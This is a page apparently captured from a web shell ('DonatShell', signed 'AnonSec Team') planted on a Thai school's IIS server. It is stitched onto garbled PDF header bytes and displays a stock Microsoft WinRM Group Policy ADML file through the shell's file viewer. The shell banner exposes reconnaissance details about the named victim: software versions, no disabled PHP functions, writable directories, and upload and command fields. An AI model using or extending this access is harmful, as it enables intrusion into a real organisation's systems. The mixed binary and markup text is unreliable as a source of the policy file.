%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Windows/PolicyDefinitions/en-US/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /Windows/PolicyDefinitions/en-US/WindowsRemoteManagement.adml
<?xml version="1.0" encoding="utf-8"?>
<!--  (c) 2006 Microsoft Corporation  -->
<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">
  <displayName>enter display name here</displayName>
  <description>enter description here</description>
  <resources>
    <stringTable>
      <string id="AllowAutoConfig">Allow automatic configuration of listeners</string>
      <string id="AllowBasic">Allow Basic authentication</string>
      <string id="AllowBasicClientHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) client uses Basic authentication.

If you enable this policy setting, the WinRM client will use Basic authentication. If WinRM is configured to use HTTP transport, then the user name and password are sent over the network as clear text.

If you disable or do not configure this policy setting, then the WinRM client will not use Basic authentication.</string>
      <string id="AllowBasicServiceHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) service accepts Basic authentication from a remote client.

If you enable this policy setting, the WinRM service will accept Basic authentication from a remote client.

If you disable or do not configure this policy setting, the WinRM service will not accept Basic authentication from a remote client.</string>
      <string id="AllowUnencrypted">Allow unencrypted traffic</string>
      <string id="AllowUnencryptedMessagesClientHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) client sends and receives unencrypted messages over the network.

If you enable this policy setting, the WinRM client sends and receives unencrypted messages over the network.

If you disable or do not configure this policy setting, the WinRM client sends or receives only encrypted messages over the network.</string>
      <string id="AllowUnencryptedMessagesServiceHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) service sends and receives unencrypted messages over the network.

If you enable this policy setting, the WinRM client sends and receives unencrypted messages over the network.

If you disable or do not configure this policy setting, the WinRM client sends or receives only encrypted messages over the network.</string>
      <string id="AutoConfigHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) service automatically listens on the network for requests on the HTTP transport over the default HTTP port.

If you enable this policy setting, the WinRM service automatically listens on the network for requests on the HTTP transport over the default HTTP port.

If you disable or do not configure this policy setting, then the WinRM service does not automatically listen on the network and you must manually create listeners on every computer.

To allow WinRM service to receive requests over the network, configure the Windows Firewall policy setting with exceptions for Port 5985 (default port for HTTP).

The service listens on the addresses specified by the IPv4 and IPv6 filters. IPv4 filter specifies one or more ranges of IPv4 addresses and IPv6 filter specifies one or more ranges of IPv6addresses. If specified, the service enumerates the available IP addresses on the computer and uses only addresses that fall within one of the filter ranges.

You should use asterisk (*) to indicate that the service listens on all available IP addresses on the computer. When * is used, other ranges in the filter are ignored. If the filter is left blank, the service does not listen on any addresses.

For example, if you want the service to listen only on IPv4 addresses, leave the IPv6 filter empty.

Ranges are specified using the syntax IP1-IP2. Multiple ranges are separated using "," (comma) as the delimiter.

Example IPv4 filters:\n2.0.0.1-2.0.0.20, 24.0.0.1-24.0.0.22
Example IPv6 filters:\n3FFE:FFFF:7654:FEDA:1245:BA98:0000:0000-3FFE:FFFF:7654:FEDA:1245:BA98:3210:4562</string>
      <string id="DisallowDigest">Disallow Digest authentication</string>
      <string id="DisallowDigestClientHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) client will not use Digest authentication.

If you enable this policy setting, the WinRM client will not use Digest authentication.

If you disable or do not configure this policy setting, the WinRM client will use Digest authentication.</string>
      <string id="DisallowNegotiate">Disallow Negotiate authentication</string>
      <string id="DisallowKerberos">Disallow Kerberos authentication</string>
      <string id="DisallowNegotiateClientHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) client will not use Negotiate authentication.

If you enable this policy setting, the WinRM client will not use Negotiate authentication.

If you disable or do not configure this policy setting, the WinRM client will use Negotiate authentication.</string>
      <string id="DisallowNegotiateServiceHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) service will not accept Negotiate authentication from a remote client.

If you enable this policy setting, the WinRM service will not accept Negotiate authentication from a remote client.

If you disable or do not configure this policy setting, the WinRM service will accept Negotiate authentication from a remote client.</string>
      <string id="DisallowKerberosClientHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) client will not use Kerberos authentication directly.

If you enable this policy setting, the Windows Remote Management (WinRM) client will not use Kerberos authentication directly. Kerberos may still be used if the WinRM client is using the Negotiate authentication and Kerberos is selected.

If you disable or do not configure this policy setting, the WinRM client will use the Kerberos authentication directly.</string>
      <string id="DisallowKerberosServiceHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) service will not accept Kerberos credentials over the network.

If you enable this policy setting, the WinRM service will not accept Kerberos credentials over the network.

If you disable or do not configure this policy setting, then the WinRM service will accept Kerberos authentication from a remote client.</string>
      <string id="AllowCredSSP">Allow CredSSP authentication</string>
      <string id="AllowCredSSPClientHelp">
        This policy setting allows you to manage whether the Windows Remote Management (WinRM) client uses CredSSP authentication.

        If you enable this policy setting, the WinRM client will use CredSSP authentication. 

        If you disable or do not configure this policy setting, then the WinRM client will not use CredSSP authentication.
      </string>
      <string id="AllowCredSSPServiceHelp">
        This policy setting allows you to manage whether the Windows Remote Management (WinRM) service accepts CredSSP authentication from a remote client.

        If you enable this policy setting, the WinRM service will accept CredSSP authentication from a remote client.

        If you disable or do not configure this policy setting, the WinRM service will not accept CredSSP authentication from a remote client.
      </string>
      <string id="CBTHardeningLevel">Specify channel binding token hardening level</string>
      <string id="CBTHardeningLevelHelp">
        This policy setting allows you to set the hardening level of the Windows Remote Management (WinRM) service with regard to channel binding tokens.

        If you enable this policy setting, the WinRM service uses the level specified in HardeningLevel to determine whether or not to accept a received request, based on a supplied channel binding token.

        If you disable or do not configure this policy setting, you may configure the hardening level locally on each computer.

        If HardeningLevel is set to Strict, any request not containing a valid channel binding token will be rejected.

        If HardeningLevel is set to Relaxed (default value), any request containing an invalid channel binding token will be rejected. However, a request that does not contain any channel binding token will be accepted (though it will not be protected from credential-forwarding attacks).

        If HardeningLevel is set to None, all requests will be accepted (though they will not be protected from credential-forwarding attacks).
      </string>
        <string id="None">None</string>
        <string id="Strict">Strict</string>
        <string id="Relaxed">Relaxed</string>
        <string id="WinRM">Windows Remote Management (WinRM)</string>
      <string id="WinRMClient">WinRM Client</string>
      <string id="WinRMService">WinRM Service</string>
      <string id="TrustedHosts">Trusted Hosts</string>
      <string id="TrustedHostsHelp">This policy setting allows you to manage whether Windows Remote Management (WinRM) client uses the list specified in TrustedHostsList to determine if the destination host is a trusted entity.

If you enable this policy setting, the WinRM client uses the list specified in TrustedHostsList to determine if the destination host is a trusted entity. The WinRM client uses this list when neither HTTPS nor Kerberos are used to authenticate the identity of the host.

If you disable or do not configure this policy setting and the WinRM client needs to use the list of trusted hosts, you must configure the list of trusted hosts locally on each computer.</string>
      <string id="HttpCompatibilityListener">Turn On Compatibility HTTP Listener</string>
      <string id="HttpsCompatibilityListener">Turn On Compatibility HTTPS Listener</string>
      <string id="HttpCompatibilityListenerHelp">This policy setting enables or disables an HTTP listener created for backward compatibility purposes in the Windows Remote Management (WinRM) service.
          
          When certain port 80 listeners are migrated to WinRM 2.0, the listener port number changes to 5985.
          
          A listener may be automatically created on port 80 to ensure backward compatibility.
          
          When this setting is enabled, this listener always appears.
          
          When this setting is disabled, this listener never appears.</string>
      <string id="HttpsCompatibilityListenerHelp">This policy setting enables or disables an HTTPS listener created for backward compatibility purposes in the Windows Remote Management (WinRM) service.
          
          When certain port 443 listeners are migrated to WinRM 2.0, the listener port number changes to 5986.
          
          A listener may be automatically created on port 443 to ensure backward compatibility.
          
          When this setting is enabled, this listener always appears.
          
          When this setting is disabled, this listener never appears.</string>
    </stringTable>
    <presentationTable>
      <presentation id="AllowAutoConfig">
        <textBox refId="AllowAutoConfig_IPv4Filter">
          <label>IPv4 filter:</label>
        </textBox>
        <textBox refId="AllowAutoConfig_IPv6Filter">
          <label>IPv6 filter:</label>
        </textBox>
        <text>Syntax:</text>
        <text>Type "*" to allow messages from any IP address, or leave the</text>
        <text>field empty to listen on no IP address. You can specify one</text>
        <text>or more ranges of IP addresses.</text>
        <text/>
        <text>Example IPv4 filters:</text>
        <text>2.0.0.1-2.0.0.20, 24.0.0.1-24.0.0.22</text>
        <text>*</text>
        <text/>
        <text>Example IPv6 filters:</text>
        <text>3FFE:FFFF:7654:FEDA:1245:BA98:0000:0000-3FFE:FFFF:7654:FEDA:1245:BA98:3210:4562</text>
        <text>*</text>
      </presentation>
      <presentation id="TrustedHosts">
        <textBox refId="TrustedHosts_List">
          <label>TrustedHostsList:</label>
        </textBox>
        <text>Syntax:</text>
        <text>Configure the trusted hosts by a comma separated list</text>
        <text>of host names. You can use wildcards (*) but only</text>
        <text>one wildcard is allowed in a host name pattern.</text>
        <text>Use "&lt;local&gt;" (case insensitive) is used to indicate</text>
        <text>all host names that do not contain a period (.).</text>
        <text>The list can be empty to indicate that no host is trusted.</text>
        <text>Use asterisk (*)  to indicate that all hosts are trusted.</text>
        <text>If you use *, then no other pattern can appear in the list.</text>
        <text/>
        <text/>
        <text>Examples:</text>
        <text>*.mydomain.com indicates that all computer in mydomain.com are trusted</text>
        <text>2.0.* indicates that all IP addresses starting with 2.0. are trusted</text>
      </presentation>
        <presentation id="CBTHardeningLevel">
            <dropdownList refId="HardeningLevelCombo" defaultItem="1">Hardening Level:</dropdownList>
        </presentation>
    </presentationTable>
  </resources>
</policyDefinitionResources>

Anon7 - 2022
AnonSec Team